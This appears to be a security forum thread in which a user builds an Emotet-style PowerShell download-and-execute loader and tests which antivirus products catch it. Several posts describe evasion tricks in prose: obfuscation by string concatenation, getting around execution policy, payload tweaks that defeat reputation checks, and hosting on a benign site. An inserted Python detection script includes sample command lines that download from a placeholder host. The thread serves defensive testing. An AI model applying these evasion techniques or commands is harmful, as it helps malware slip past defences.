Q&A How well are you protected against Emotet?

McMcbrad

Level 20
Oct 16, 2020
967
Hi all,

I'm sure by now we have all heard about the Emotet threat. The way it gets distributed is via documents with malicious macros. Users are tricked into executing the macro.


Upon execution, PowerShell is launched, usually with the -e argument (encoded string). After the -e argument, obfuscated code can be found.

To test antivirus protection capabilities, I have created an Emotet of my own.
It's actually a fairly simple loader.

It contains highly obfuscated code, which has 3 commands only: it imports the BitsTransfer module, downloads a malicious file (really malicious) and then runs it. This simulates the Emotet delivery method.

This is what my Emotet-wanna-be looks like.
[attachment: screenshot of the first sample]

Upon uploading it to VirusTotal, I saw there were 4 products flagging it immediately: Kaspersky, Eset, ZoneAlarm (Kaspersky again) and Cat-QuickHeal.

I then created a second version of it:
[attachment: screenshot of the second sample]


This time it didn't use the -noexit argument, which makes it less suspicious.
This time it was detected only by Kaspersky.
More advanced explanation:


The sample imitates an Emotet loader, in fact I got inspired by Emotet, which Microsoft claims to have blocked with machine learning model in seconds... there was this sort of post on their blog, if I am not mistaken. Hope the Emotet team doesn’t come after me with copyright claims 😆

So I downloaded a malicious sample and uploaded it to a benign website (won’t disclose all details for security reasons). This way I bypassed web filter blacklists.
The Emotet loader simulator uses BitsTransfer (Emotet uses System.Net.WebClient) to download the malicious file and write it on the Desktop. Writing to the desktop decreases machine learning sensitivity as opposed to writing in temp folder or somewhere else.
To make things a bit more interesting, I used a hex editor to slightly modify the downloaded malicious file, which bypassed any reputation technologies. Finally, PowerShell executes the sample. To decrease machine learning sensitivity throughout the whole process, on the second sample I’ve removed attributes such as hidden window, no exit and others.
I used a tool widely available on the web to obfuscate the code, just like the Emotet creators do. It hasn’t been encoded with base64 (unlike Emotet) but has been concatenated, which makes it unreadable to humans and also bypasses signatures and heuristics. To bypass the execution policy, I ran the code as an argument, not as a script.
It took me less than 20 minutes to do all that, and as for the result, a few of them have failed already. The malicious sample was a variant of the NanoCore RAT (known for its privilege escalation) and was successfully executed in all test cases. There was not even a UAC prompt. Avast’s IDP kicked in and removed NanoCore, but wasn’t smart enough to correlate it to my loader. Defender and Malwarebytes did nothing. Kaspersky detected everything upfront; Eset detected the first one, probably due to attributes commonly used by malware.
 

McMcbrad

Level 20
Oct 16, 2020
967
From my test I can confirm Kaspersky is the most effective against this type of malware. But that wasn’t the main objective. The point was to prove that the 0-day performance observed in test labs is impossible.
Needless to say, if I were an attacker, I could plant this code anywhere: from a document, to scheduled tasks, to your registry. Off the top of my head I can think of a few ways I could redistribute it.
 

Andy Ful

Level 67
Verified
Trusted
Content Creator
Dec 23, 2014
5,629
Yeah, now I'm using Simplewall and it seems the same (for free) as Glasswire, except for the shiny interface and the extra checking option by VirusTotal.
But this price is very good for 3 years.
Simplewall will not stop this attack unless you block svchost.exe (not recommended for most users). This attack uses BITS, which cannot normally be blocked by a firewall.
 

McMcbrad

Level 20
Oct 16, 2020
967
Simplewall will not stop this attack unless you block svchost.exe (not recommended for most users). This attack uses BITS, which cannot normally be blocked by a firewall.
I don’t think System.Net.WebClient can be blocked either.
I could go even further. I could choose to download a malicious DLL instead of an executable and utilise rundll32.exe.
 

SecurityNightmares

Level 32
Verified
Jan 9, 2020
2,092
Are the recommended Defender settings from ConfigureDefender together with the recommended settings (I use some extended settings) from Hard_Configurator enough? Ah, and of course with the recommended settings from the included Firewall tool (without blocking LOLBins).

It's at least SRP with scripts blocked.
 

McMcbrad

Level 20
Oct 16, 2020
967
Are the recommended Defender settings from ConfigureDefender together with the recommended settings (I use some extended settings) from Hard_Configurator enough? Ah, and of course with the recommended settings from the included Firewall tool (without blocking LOLBins).

It's at least SRP with scripts blocked.
Windows Defender now detects the first sample as PowerSploit. Who knew I had created a PowerShell exploit... Everything felt like a joke 😅
We’ll see later today if it can stop the brand new sample with ConfigureDefender.
 

McMcbrad

Level 20
Oct 16, 2020
967
The file gets downloaded by the Windows Service Host and not by a browser or productivity app. To bypass your rating system, I could download either a DLL instead of an executable, or I could download an archive. If I were to take this seriously, I could obtain a certificate from Comodo themselves, which is a common tactic. So Comodo won’t help you either.
 


Nagisa

Level 6
Verified
Jul 19, 2018
288
The file gets downloaded by the Windows Service Host and not by a browser or productivity app. To bypass your rating system, I could download either a DLL instead of an executable, or I could download an archive. If I were to take this seriously, I could obtain a certificate from Comodo themselves, which is a common tactic. So Comodo won’t help you either.

I was actually aiming for blocking the very first PowerShell script that's executed when you open the file.

Upon execution, PowerShell is launched, usually with the -e argument (encoded string). After the -e argument, obfuscated code can be found.
 

McMcbrad

Level 20
Oct 16, 2020
967
I was actually aiming for blocking the very first PowerShell script, which downloads the actual malicious file.
It’s not a script, it’s a bat file that launches PowerShell with an argument, which misleads PowerShell into thinking that this is not a script but rather code that you personally typed and composed. Then PowerShell itself doesn’t do anything. It tells svchost to download and write the file. In the end it just executes it. To block this attack with 100% success, you need to block PowerShell invocation through WMI and CMD. I know how to do it with McAfee ENS, but I am not sure how it’s done on Comodo.
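Detection logic for the launch pattern described in this post and in the opening post (PowerShell started from cmd.exe or WMI, an encoded command, a hidden window, -NoExit, a BITS or WebClient download, and string-concatenated code). This is an added example for readers of the thread, not code from any poster or product. It assumes Sysmon-style process-creation field names (Image, ParentImage, CommandLine); the log records, URL, paths and weights are constructed for illustration.

```python
import re

# Constructed process-creation records (assumed Sysmon Event ID 1 field names).
# The first two mirror the loader the thread describes: PowerShell launched
# from cmd.exe, a BITS download to the Desktop, a string-concatenated path.
# The third is an ordinary admin script; the fourth is an encoded command
# started through WMI. URL and paths are placeholders.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'powershell -noexit -w hidden -c "Import-Module BitsTransfer; '
                    r'Start-BitsTransfer -Source http://example.invalid/u '
                    r'-Destination ("C:\Users"+"\Public"+"\Desk"+"top\svc.exe")"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'powershell -c "Import-Module BitsTransfer; '
                    r'Start-BitsTransfer -Source http://example.invalid/u '
                    r'-Destination ("C:\Users"+"\Public"+"\Desk"+"top\svc.exe")"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": "powershell -enc QQBCAEMA"},  # constructed; decodes to "ABC"
]

# Parents the thread names as launch paths (cmd.exe, WMI) plus the Office hosts
# that run the macro stage.
SUSPICIOUS_PARENTS = {"cmd.exe", "wmiprvse.exe", "winword.exe", "excel.exe", "outlook.exe"}

# (tag, regex applied to the command line, weight). Weights are an assumption.
INDICATORS = [
    ("encoded_command", re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?\b"), 3),
    ("hidden_window", re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"), 2),
    ("no_exit", re.compile(r"(?i)-noe(?:xit)?\b"), 1),
    ("bits_download", re.compile(r"(?i)Start-BitsTransfer|Import-Module\s+BitsTransfer"), 2),
    ("webclient", re.compile(r"(?i)Net\.WebClient|Download(?:File|String)\("), 2),
]
# "..."+"..." joins: the concatenation obfuscation the opening post describes.
CONCAT = re.compile(r"""['"]\s*\+\s*['"]""")
THRESHOLD = 4  # assumed alert threshold


def basename(path):
    """Last path component, lower-cased, for either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def assess(event):
    """Score one process-creation record; only PowerShell hosts are scored."""
    if basename(event["Image"]) not in ("powershell.exe", "pwsh.exe"):
        return {"score": 0, "tags": []}
    tags, score = [], 0
    if basename(event["ParentImage"]) in SUSPICIOUS_PARENTS:
        tags.append("suspicious_parent")
        score += 2
    cmd = event["CommandLine"]
    for tag, rx, weight in INDICATORS:
        if rx.search(cmd):
            tags.append(tag)
            score += weight
    if len(CONCAT.findall(cmd)) >= 3:
        tags.append("string_concat_obfuscation")
        score += 2
    return {"score": score, "tags": tags}


def scan(events):
    """Return (index, score, tags) for every record at or above THRESHOLD."""
    flagged = []
    for i, ev in enumerate(events):
        result = assess(ev)
        if result["score"] >= THRESHOLD:
            flagged.append((i, result["score"], result["tags"]))
    return flagged


if __name__ == "__main__":
    for idx, score, tags in scan(SAMPLE_EVENTS):
        print(f"event {idx}: score {score}, indicators {', '.join(tags)}")
```

Note that the second constructed record, which drops -noexit and the hidden window exactly as the second sample in the opening post did, still crosses the threshold because the cmd.exe parent, the BITS cmdlets and the concatenated strings remain; the single indicator Eset keyed on is not the only signal available.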
 

Nagisa

Level 6
Verified
Jul 19, 2018
288
It’s not a script, it’s a bat file that launches PowerShell with an argument, which misleads PowerShell into thinking that this is not a script but rather code that you personally typed and composed. Then PowerShell itself doesn’t do anything. It tells svchost to download and write the file. In the end it just executes it.
But still, the .bat file has to be executed by the office application first. Am I understanding it wrong?

[attachment: screenshot]
 

McMcbrad

Level 20
Oct 16, 2020
967
But still, the .bat file has to be executed by the office application first. Am I understanding it wrong?

[attachment: screenshot]
In my case I was too lazy to put in more effort, so you have to execute the bat file. It’s not through an office app; *.bat gets executed through CMD when you double-click the file.
If I were to embed this in a document, you wouldn’t have to do anything else other than clicking “allow content”. It will automatically do everything else for you. There are many other possible ways to run this code on your machine.

@Freud2004 Yes, the first sample was blocked by Kaspersky and Eset. Eset detected it because I attempted to run PowerShell with a hidden window, which is a smart and generic method to detect this sort of malware. I removed this parameter on the second attack and, as suspected, Eset failed. Only Kaspersky blocked it. Avast was able to remove what I succeeded in downloading, based on the way it had been introduced. So you can’t really say it failed. It reported the link I generated (apparently) and it was blacklisted in minutes. This is the right approach and I must say I’m impressed.

Unfortunately I can’t test every AV myself, but I would be happy to provide a sample to malware testers on here.
 